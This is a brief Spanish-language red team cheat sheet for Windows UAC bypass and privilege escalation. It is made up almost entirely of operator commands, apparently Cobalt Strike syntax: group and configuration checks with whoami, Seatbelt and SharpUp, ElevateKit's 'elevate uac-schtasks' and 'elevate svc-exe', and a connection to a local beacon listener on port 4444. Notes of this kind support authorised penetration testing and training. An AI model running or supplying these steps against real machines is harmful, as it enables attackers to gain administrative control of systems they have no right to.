Documentacion
Red Team
Privilege Escalation
UAC Bypass

UAC Bypass

Verificar grupos.

run whoami /groups

Obtener informacion de la configuracion.

execute-assembly c:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe uac

Verificar si es posible hacer bypass.

execute-assembly C:\Tools\SharpUp.exe audit

Bypass UAC ElevateKit.

elevate uac-schtasks tcp-local
run netstat -anop tcp
connect localhost 4444
elevate svc-exe
Always Install Elevated